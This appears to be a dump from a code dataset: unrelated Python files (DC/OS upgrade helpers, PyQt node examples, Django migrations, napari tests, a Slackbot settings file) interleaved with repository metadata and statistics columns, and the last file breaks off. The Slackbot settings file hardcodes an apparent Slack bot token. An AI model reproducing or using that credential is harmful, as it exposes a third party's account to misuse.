src/dcos_e2e_cli/common/upgrade.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 225
|
2017-09-08T02:24:58.000Z
|
2018-05-16T12:18:58.000Z
|
src/dcos_e2e_cli/common/upgrade.py
|
jongiddy/dcos-e2e
|
b52ef9a1097a8fb328902064345cc6c8b0bf5779
|
[
"Apache-2.0"
] | 21
|
2018-06-14T21:58:24.000Z
|
2021-11-15T19:18:06.000Z
|
"""
Helpers for installing DC/OS.
"""
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Iterable, Tuple
import click
from halo import Halo
from dcos_e2e.cluster import Cluster
from dcos_e2e.node import Output
from .base_classes import ClusterRepresentation
from .error_handling import show_calledprocess_error
def cluster_upgrade_dcos_from_path(
cluster: Cluster,
cluster_representation: ClusterRepresentation,
ip_detect_path: Path,
dcos_config: Dict[str, Any],
files_to_copy_to_genconf_dir: Iterable[Tuple[Path, Path]],
dcos_installer: Path,
doctor_message: str,
enable_spinner: bool,
) -> None:
"""
Upgrade DC/OS on a cluster.
Args:
cluster: The cluster to upgrade DC/OS on.
cluster_representation: A representation of the cluster.
ip_detect_path: The ``ip-detect`` script to use for installing DC/OS.
files_to_copy_to_genconf_dir: Pairs of host paths to paths on the
installer node. These are files to copy from the host to the
installer node before upgrading DC/OS.
dcos_config: The DC/OS configuration to use.
dcos_installer: The ``Path`` to a local DC/OS installer.
doctor_message: A message which instructs the user on which command to
use if installation fails.
enable_spinner: Whether to enable the spinner animation.
"""
spinner = Halo(enabled=enable_spinner)
spinner.start('Upgrading DC/OS')
try:
cluster.upgrade_dcos_from_path(
dcos_installer=dcos_installer,
dcos_config=dcos_config,
ip_detect_path=ip_detect_path,
files_to_copy_to_genconf_dir=files_to_copy_to_genconf_dir,
output=Output.LOG_AND_CAPTURE,
)
except subprocess.CalledProcessError as exc:
spinner.stop()
show_calledprocess_error(exc=exc)
click.echo(doctor_message)
cluster_representation.destroy()
sys.exit(exc.returncode)
spinner.succeed()
def cluster_upgrade_dcos_from_url(
cluster: Cluster,
cluster_representation: ClusterRepresentation,
ip_detect_path: Path,
dcos_config: Dict[str, Any],
files_to_copy_to_genconf_dir: Iterable[Tuple[Path, Path]],
dcos_installer: str,
doctor_message: str,
enable_spinner: bool,
) -> None:
"""
Upgrade DC/OS on a cluster.
Args:
cluster: The cluster to upgrade DC/OS on.
cluster_representation: A representation of the cluster.
ip_detect_path: The ``ip-detect`` script to use for installing DC/OS.
files_to_copy_to_genconf_dir: Pairs of host paths to paths on the
installer node. These are files to copy from the host to the
installer node before upgrading DC/OS.
dcos_config: The DC/OS configuration to use.
dcos_installer: A URL pointing to an installer.
doctor_message: A message which instructs the user on which command to
use if installation fails.
enable_spinner: Whether to enable the spinner animation.
"""
spinner = Halo(enabled=enable_spinner)
spinner.start('Upgrading DC/OS')
try:
cluster.upgrade_dcos_from_url(
dcos_installer=dcos_installer,
dcos_config=dcos_config,
ip_detect_path=ip_detect_path,
files_to_copy_to_genconf_dir=files_to_copy_to_genconf_dir,
output=Output.LOG_AND_CAPTURE,
)
except subprocess.CalledProcessError as exc:
spinner.stop()
show_calledprocess_error(exc=exc)
click.echo(doctor_message)
cluster_representation.destroy()
sys.exit(exc.returncode)
spinner.succeed()
| 33.267857
| 78
| 0.694042
| 490
| 3,726
| 5.036735
| 0.189796
| 0.02269
| 0.044571
| 0.042139
| 0.86953
| 0.843598
| 0.843598
| 0.843598
| 0.843598
| 0.843598
| 0
| 0.000708
| 0.241546
| 3,726
| 111
| 79
| 33.567568
| 0.872611
| 0.371981
| 0
| 0.71875
| 0
| 0
| 0.013599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.15625
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5472bc3d527750bfb50c5e56c38d936fceee316
| 1,970
|
py
|
Python
|
examples/simple/testnode.py
|
DrLuke/effigy
|
c970d945fc22787bd6b95ec2f1dfd317876ef4dc
|
[
"MIT"
] | null | null | null |
examples/simple/testnode.py
|
DrLuke/effigy
|
c970d945fc22787bd6b95ec2f1dfd317876ef4dc
|
[
"MIT"
] | null | null | null |
examples/simple/testnode.py
|
DrLuke/effigy
|
c970d945fc22787bd6b95ec2f1dfd317876ef4dc
|
[
"MIT"
] | null | null | null |
from effigy import QNodeSceneNode, NodeIO, NodeInput, NodeOutput
from PyQt5.QtWidgets import QGraphicsRectItem
from PyQt5.QtCore import QRectF, QPointF, Qt
from PyQt5.QtGui import QPen, QColor, QBrush
class TestNode(QNodeSceneNode):
author = "Luke"
modulename = "testmod"
name = "Example Node"
def addIO(self):
newnode = NodeOutput(str, parent=self, name="output")
newnode.setPos(20, 10)
self.IO["output"] = newnode
newnode = NodeInput(str, parent=self, name="input")
newnode.setPos(-20, 10)
self.IO["input"] = newnode
def boundingRect(self):
return self.mainRect.rect()
def addGraphicsItems(self):
self.mainRect = QGraphicsRectItem(QRectF(-15, -15, 30, 30), self)
def selectedChanged(self, state):
if state:
self.mainRect.setPen(QPen(Qt.red))
else:
self.mainRect.setPen(QPen(Qt.black))
def serialize(self):
return {"testdata": self.id}
def deserialize(self, data):
print("This node has data: %s" % data["testdata"])
class TestNode2(QNodeSceneNode):
author = "Luke"
modulename = "testmod"
name = "Example Node"
def addIO(self):
newnode = NodeOutput(int, parent=self, name="output")
newnode.setPos(20, 10)
self.IO["output"] = newnode
newnode = NodeInput([int, str], parent=self, name="input")
newnode.setPos(-25, 10)
self.IO["input"] = newnode
def boundingRect(self):
return self.mainRect.rect()
def addGraphicsItems(self):
self.mainRect = QGraphicsRectItem(QRectF(-15, -15, 30, 30), self)
def selectedChanged(self, state):
if state:
self.mainRect.setPen(QPen(Qt.red))
else:
self.mainRect.setPen(QPen(Qt.black))
def serialize(self):
return {"testdata": self.id}
def deserialize(self, data):
print("This node has data: %s" % data["testdata"])
| 28.142857
| 73
| 0.62132
| 227
| 1,970
| 5.39207
| 0.286344
| 0.078431
| 0.045752
| 0.071895
| 0.831699
| 0.831699
| 0.830065
| 0.772876
| 0.772876
| 0.772876
| 0
| 0.024374
| 0.250254
| 1,970
| 70
| 74
| 28.142857
| 0.804333
| 0
| 0
| 0.769231
| 0
| 0
| 0.084221
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.076923
| 0.076923
| 0.538462
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
e57397ac8823d3b4a2d993a40f35759fd877b2cb
| 160
|
py
|
Python
|
test/login.py
|
cz495969281/test007
|
43001233e7b61ee281c299cd66dedbd08eb667d8
|
[
"MIT"
] | null | null | null |
test/login.py
|
cz495969281/test007
|
43001233e7b61ee281c299cd66dedbd08eb667d8
|
[
"MIT"
] | null | null | null |
test/login.py
|
cz495969281/test007
|
43001233e7b61ee281c299cd66dedbd08eb667d8
|
[
"MIT"
] | null | null | null |
print("------------------")
print("------------------")
print("------------------")
print("------------------")
print("------------------")
num1 = 10
num2 = 20
| 20
| 27
| 0.23125
| 9
| 160
| 4.111111
| 0.555556
| 1.081081
| 1.216216
| 1.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040268
| 0.06875
| 160
| 7
| 28
| 22.857143
| 0.208054
| 0
| 0
| 0.714286
| 0
| 0
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.714286
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e5b5072f92e155561bc18cfadcbcd310c9fd1b61
| 262
|
py
|
Python
|
slack/python/slack_aiml_test/settings.py
|
m4573rn3rd/scripts
|
df29a79b5ed6a996ccf0357e4fe495dd05377848
|
[
"MIT"
] | null | null | null |
slack/python/slack_aiml_test/settings.py
|
m4573rn3rd/scripts
|
df29a79b5ed6a996ccf0357e4fe495dd05377848
|
[
"MIT"
] | null | null | null |
slack/python/slack_aiml_test/settings.py
|
m4573rn3rd/scripts
|
df29a79b5ed6a996ccf0357e4fe495dd05377848
|
[
"MIT"
] | null | null | null |
# Slackbot API Information
slack_bot_token = "xoxb-2650828670406-2670419769553-qxTzP6Sbh9tlqfYIA52wh1bZ"
bot_id = "xoxb-2650828670406-2670419769553-qxTzP6Sbh9tlqfYIA52wh1bZ"
# AIML FIles
directory = "/aiml"
learn_file = "std-startup.xml"
respond = "load aiml b"
| 32.75
| 77
| 0.80916
| 29
| 262
| 7.172414
| 0.758621
| 0.163462
| 0.288462
| 0.519231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.260504
| 0.091603
| 262
| 8
| 78
| 32.75
| 0.613445
| 0.133588
| 0
| 0
| 0
| 0
| 0.644444
| 0.506667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b72a057874a519f9464ed9ed2e2bbd59ff53aa
| 211
|
py
|
Python
|
src/events/game_start.py
|
ArcosJuan/Get-out-of-my-fucking-maze
|
ca2cfeaaeecb6c6f583ad647d020f25176170805
|
[
"MIT"
] | 1
|
2022-03-12T21:38:46.000Z
|
2022-03-12T21:38:46.000Z
|
src/events/game_start.py
|
ArcosJuan/Get-out-of-my-fucking-maze
|
ca2cfeaaeecb6c6f583ad647d020f25176170805
|
[
"MIT"
] | null | null | null |
src/events/game_start.py
|
ArcosJuan/Get-out-of-my-fucking-maze
|
ca2cfeaaeecb6c6f583ad647d020f25176170805
|
[
"MIT"
] | null | null | null |
from src.events import Event
class GameStart(Event):
def __init__(self, min_size):
super().__init__()
self.min_size = min_size
def get_min_size(self): return self.min_size
| 21.1
| 48
| 0.64455
| 29
| 211
| 4.206897
| 0.517241
| 0.286885
| 0.270492
| 0.245902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265403
| 211
| 10
| 48
| 21.1
| 0.787097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e5ebc4932df04eab5f87fbd870f222dde7998412
| 15
|
py
|
Python
|
app/containers/Codedash/js/data/generator/temp.py
|
GAUTAMRAJU15/demo
|
fd11b6db098d5b0dec4de74590ff5239dd614a7e
|
[
"MIT"
] | null | null | null |
app/containers/Codedash/js/data/generator/temp.py
|
GAUTAMRAJU15/demo
|
fd11b6db098d5b0dec4de74590ff5239dd614a7e
|
[
"MIT"
] | 4
|
2020-04-05T22:02:22.000Z
|
2022-03-24T07:58:59.000Z
|
app/containers/Codedash/js/data/generator/temp.py
|
GAUTAMRAJU15/demo
|
fd11b6db098d5b0dec4de74590ff5239dd614a7e
|
[
"MIT"
] | null | null | null |
print(8%6-5/3)
| 7.5
| 14
| 0.6
| 5
| 15
| 1.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 0.066667
| 15
| 1
| 15
| 15
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
f919e1e1800f004de4f9772da02f5180f9091681
| 9,460
|
py
|
Python
|
src/pages/migrations/0002_auto_20191214_1316.py
|
ahsanali2000/Patientio
|
254896ba0386a3738b5fd13800e1d524a5c47bea
|
[
"BSD-3-Clause"
] | 2
|
2020-04-19T20:13:46.000Z
|
2022-03-11T09:48:53.000Z
|
src/pages/migrations/0002_auto_20191214_1316.py
|
ahsanali2000/Patientio
|
254896ba0386a3738b5fd13800e1d524a5c47bea
|
[
"BSD-3-Clause"
] | 1
|
2020-06-26T22:26:22.000Z
|
2020-06-26T22:28:25.000Z
|
src/pages/migrations/0002_auto_20191214_1316.py
|
ahsanali2000/Patientio
|
254896ba0386a3738b5fd13800e1d524a5c47bea
|
[
"BSD-3-Clause"
] | 3
|
2020-06-21T20:52:12.000Z
|
2021-07-31T11:07:21.000Z
|
# Generated by Django 3.0 on 2019-12-14 08:16
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pages', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='doctor',
name='person',
),
migrations.RemoveField(
model_name='history',
name='patient',
),
migrations.RemoveField(
model_name='labdoc',
name='person',
),
migrations.RemoveField(
model_name='nurse',
name='person',
),
migrations.RemoveField(
model_name='receptionist',
name='person',
),
migrations.RemoveField(
model_name='report',
name='patient',
),
migrations.AddField(
model_name='appointment',
name='disease_option',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AddField(
model_name='appointment',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='doctor',
name='address',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='doctor',
name='age',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='doctor',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AddField(
model_name='doctor',
name='first_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='doctor',
name='image',
field=models.FileField(default='', upload_to='images/'),
),
migrations.AddField(
model_name='doctor',
name='last_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='doctor',
name='phone',
field=models.CharField(blank=True, max_length=20, null=True),
),
migrations.AddField(
model_name='doctor',
name='sex',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AddField(
model_name='history',
name='address',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='history',
name='age',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='history',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AddField(
model_name='history',
name='first_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='history',
name='image',
field=models.FileField(default='', upload_to='images/'),
),
migrations.AddField(
model_name='history',
name='last_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='history',
name='phone',
field=models.CharField(blank=True, max_length=20, null=True),
),
migrations.AddField(
model_name='history',
name='sex',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AddField(
model_name='history',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='labdoc',
name='address',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='labdoc',
name='age',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='labdoc',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AddField(
model_name='labdoc',
name='first_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='labdoc',
name='image',
field=models.FileField(default='', upload_to='images/'),
),
migrations.AddField(
model_name='labdoc',
name='last_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='labdoc',
name='phone',
field=models.CharField(blank=True, max_length=20, null=True),
),
migrations.AddField(
model_name='labdoc',
name='sex',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AddField(
model_name='nurse',
name='address',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='nurse',
name='age',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='nurse',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AddField(
model_name='nurse',
name='first_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='nurse',
name='image',
field=models.FileField(default='', upload_to='images/'),
),
migrations.AddField(
model_name='nurse',
name='last_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='nurse',
name='phone',
field=models.CharField(blank=True, max_length=20, null=True),
),
migrations.AddField(
model_name='nurse',
name='sex',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AddField(
model_name='receptionist',
name='address',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='receptionist',
name='age',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='receptionist',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True),
),
migrations.AddField(
model_name='receptionist',
name='first_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='receptionist',
name='image',
field=models.FileField(default='', upload_to='images/'),
),
migrations.AddField(
model_name='receptionist',
name='last_name',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AddField(
model_name='receptionist',
name='phone',
field=models.CharField(blank=True, max_length=20, null=True),
),
migrations.AddField(
model_name='receptionist',
name='sex',
field=models.CharField(blank=True, max_length=15, null=True),
),
migrations.AddField(
model_name='report',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='appointment',
name='doctor',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='service',
name='icon',
field=models.FileField(default='', upload_to='images/'),
),
migrations.AlterField(
model_name='service',
name='image',
field=models.FileField(default='', upload_to='images/'),
),
migrations.DeleteModel(
name='Patient',
),
migrations.DeleteModel(
name='Person',
),
]
| 33.546099
| 133
| 0.540803
| 891
| 9,460
| 5.612795
| 0.089787
| 0.095381
| 0.20236
| 0.237552
| 0.902819
| 0.902819
| 0.832434
| 0.824835
| 0.772446
| 0.772446
| 0
| 0.015868
| 0.333827
| 9,460
| 281
| 134
| 33.66548
| 0.77769
| 0.004545
| 0
| 0.941818
| 1
| 0
| 0.083165
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010909
| 0
| 0.021818
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0088f28f1c6652002fa08ccee3e16f6c267e08ec
| 2,424
|
py
|
Python
|
napari/components/_tests/test_world_coordinates.py
|
mrocklin/napari
|
b61d9ae570e30091a97b6c76e37cd95fe5b296b6
|
[
"BSD-3-Clause"
] | 1
|
2021-04-04T21:25:04.000Z
|
2021-04-04T21:25:04.000Z
|
napari/components/_tests/test_world_coordinates.py
|
mrocklin/napari
|
b61d9ae570e30091a97b6c76e37cd95fe5b296b6
|
[
"BSD-3-Clause"
] | 1
|
2020-10-15T19:31:09.000Z
|
2020-10-15T19:39:33.000Z
|
napari/components/_tests/test_world_coordinates.py
|
mrocklin/napari
|
b61d9ae570e30091a97b6c76e37cd95fe5b296b6
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from napari.components import ViewerModel
def test_translated_images():
"""Test two translated images."""
viewer = ViewerModel()
np.random.seed(0)
data = np.random.random((10, 10, 10))
viewer.add_image(data)
viewer.add_image(data, translate=[10, 0, 0])
assert viewer.dims.range[0] == (0, 20 - 1, 1)
assert viewer.dims.range[1] == (0, 10 - 1, 1)
assert viewer.dims.range[2] == (0, 10 - 1, 1)
assert viewer.dims.nsteps == [20, 10, 10]
for i in range(viewer.dims.nsteps[0]):
viewer.dims.set_current_step(0, i)
assert viewer.dims.current_step[0] == i
def test_scaled_images():
"""Test two scaled images."""
viewer = ViewerModel()
np.random.seed(0)
data = np.random.random((10, 10, 10))
viewer.add_image(data)
viewer.add_image(data[::2], scale=[2, 1, 1])
assert viewer.dims.range[0] == (0, 10 - 1, 1)
assert viewer.dims.range[1] == (0, 10 - 1, 1)
assert viewer.dims.range[2] == (0, 10 - 1, 1)
assert viewer.dims.nsteps == [10, 10, 10]
for i in range(viewer.dims.nsteps[0]):
viewer.dims.set_current_step(0, i)
assert viewer.dims.current_step[0] == i
def test_scaled_and_translated_images():
"""Test scaled and translated images."""
viewer = ViewerModel()
np.random.seed(0)
data = np.random.random((10, 10, 10))
viewer.add_image(data)
viewer.add_image(data[::2], scale=[2, 1, 1], translate=[10, 0, 0])
assert viewer.dims.range[0] == (0, 20 - 2, 1)
assert viewer.dims.range[1] == (0, 10 - 1, 1)
assert viewer.dims.range[2] == (0, 10 - 1, 1)
assert viewer.dims.nsteps == [19, 10, 10]
for i in range(viewer.dims.nsteps[0]):
viewer.dims.set_current_step(0, i)
assert viewer.dims.current_step[0] == i
def test_both_scaled_and_translated_images():
"""Test both scaled and translated images."""
viewer = ViewerModel()
np.random.seed(0)
data = np.random.random((10, 10, 10))
viewer.add_image(data, scale=[2, 1, 1])
viewer.add_image(data, scale=[2, 1, 1], translate=[20, 0, 0])
assert viewer.dims.range[0] == (0, 40 - 2, 2)
assert viewer.dims.range[1] == (0, 10 - 1, 1)
assert viewer.dims.range[2] == (0, 10 - 1, 1)
assert viewer.dims.nsteps == [20, 10, 10]
for i in range(viewer.dims.nsteps[0]):
viewer.dims.set_current_step(0, i)
assert viewer.dims.current_step[0] == i
| 35.647059
| 70
| 0.618812
| 387
| 2,424
| 3.790698
| 0.105943
| 0.190866
| 0.218132
| 0.171779
| 0.923654
| 0.90184
| 0.861622
| 0.861622
| 0.819359
| 0.819359
| 0
| 0.084595
| 0.209984
| 2,424
| 67
| 71
| 36.179104
| 0.681462
| 0.05198
| 0
| 0.685185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.37037
| 1
| 0.074074
| false
| 0
| 0.037037
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dabd39aef0dadaaac78062270877c1da8518c8b7
| 1,809
|
py
|
Python
|
diventi/adventures/migrations/0007_auto_20200502_1136.py
|
flavoi/diven
|
3173ca3ca3fbedc191b8eab3639a6bceb3c442c4
|
[
"Apache-2.0"
] | 2
|
2019-06-27T16:00:17.000Z
|
2020-08-14T07:46:05.000Z
|
diventi/adventures/migrations/0007_auto_20200502_1136.py
|
flavoi/diven
|
3173ca3ca3fbedc191b8eab3639a6bceb3c442c4
|
[
"Apache-2.0"
] | 26
|
2020-02-15T22:39:35.000Z
|
2022-02-19T21:09:01.000Z
|
diventi/adventures/migrations/0007_auto_20200502_1136.py
|
flavoi/diven
|
3173ca3ca3fbedc191b8eab3639a6bceb3c442c4
|
[
"Apache-2.0"
] | 1
|
2021-11-12T22:30:15.000Z
|
2021-11-12T22:30:15.000Z
|
# Generated by Django 2.2.12 on 2020-05-02 09:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('adventures', '0006_auto_20200502_1130'),
]
operations = [
migrations.AddField(
model_name='antagonist',
name='description_en',
field=models.TextField(blank=True, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='antagonist',
name='description_it',
field=models.TextField(blank=True, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='antagonist',
name='title_en',
field=models.CharField(max_length=50, null=True, verbose_name='title'),
),
migrations.AddField(
model_name='antagonist',
name='title_it',
field=models.CharField(max_length=50, null=True, verbose_name='title'),
),
migrations.AddField(
model_name='antagonistgoal',
name='description_en',
field=models.TextField(blank=True, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='antagonistgoal',
name='description_it',
field=models.TextField(blank=True, null=True, verbose_name='description'),
),
migrations.AddField(
model_name='antagonistgoal',
name='title_en',
field=models.CharField(max_length=50, null=True, verbose_name='title'),
),
migrations.AddField(
model_name='antagonistgoal',
name='title_it',
field=models.CharField(max_length=50, null=True, verbose_name='title'),
),
]
| 33.5
| 86
| 0.588723
| 177
| 1,809
| 5.841808
| 0.248588
| 0.139265
| 0.17795
| 0.208897
| 0.851064
| 0.851064
| 0.851064
| 0.805609
| 0.805609
| 0.805609
| 0
| 0.031177
| 0.290768
| 1,809
| 53
| 87
| 34.132075
| 0.774747
| 0.025428
| 0
| 0.851064
| 1
| 0
| 0.159568
| 0.013061
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
dad6d9d8b61676f25e557d3c2409faf57a2068d9
| 531
|
py
|
Python
|
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Internal/Forms/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | 1
|
2020-03-25T03:27:24.000Z
|
2020-03-25T03:27:24.000Z
|
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Internal/Forms/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Internal/Forms/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import ExColumnHeader
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import ExListView
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import HelpProvider
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import IInPlaceEditUpdater
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import InPlaceEditControl
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import LabelEllipsis
from __clrclasses__.Autodesk.AutoCAD.Internal.Forms import ListViewCellEditEventArgs
| 66.375
| 84
| 0.894539
| 56
| 531
| 7.982143
| 0.25
| 0.219239
| 0.344519
| 0.454139
| 0.751678
| 0.751678
| 0.751678
| 0
| 0
| 0
| 0
| 0
| 0.052731
| 531
| 7
| 85
| 75.857143
| 0.888668
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
dae9779e1eb09d8e88bb707ec8f1d00c50c5783f
| 9,006
|
py
|
Python
|
tests/api/ranklist_row_tests.py
|
ericbrandwein/CodeforcesAPI
|
12ae641910a3308033584dc518bb2fc0173e56f3
|
[
"MIT"
] | 26
|
2015-06-21T16:19:44.000Z
|
2021-11-15T12:32:25.000Z
|
tests/api/ranklist_row_tests.py
|
ericbrandwein/CodeforcesAPI
|
12ae641910a3308033584dc518bb2fc0173e56f3
|
[
"MIT"
] | 5
|
2015-03-10T06:00:52.000Z
|
2020-01-18T12:59:25.000Z
|
tests/api/ranklist_row_tests.py
|
ericbrandwein/CodeforcesAPI
|
12ae641910a3308033584dc518bb2fc0173e56f3
|
[
"MIT"
] | 12
|
2015-04-24T17:16:50.000Z
|
2022-01-04T14:21:25.000Z
|
"""
This module provides classes for testing RanklistRow object
"""
import unittest
from codeforces import RanklistRow, Party, ProblemResult
class RanklistRowTests(unittest.TestCase):
def setUp(self):
self.row = RanklistRow()
def load_from_dict(self):
d = {
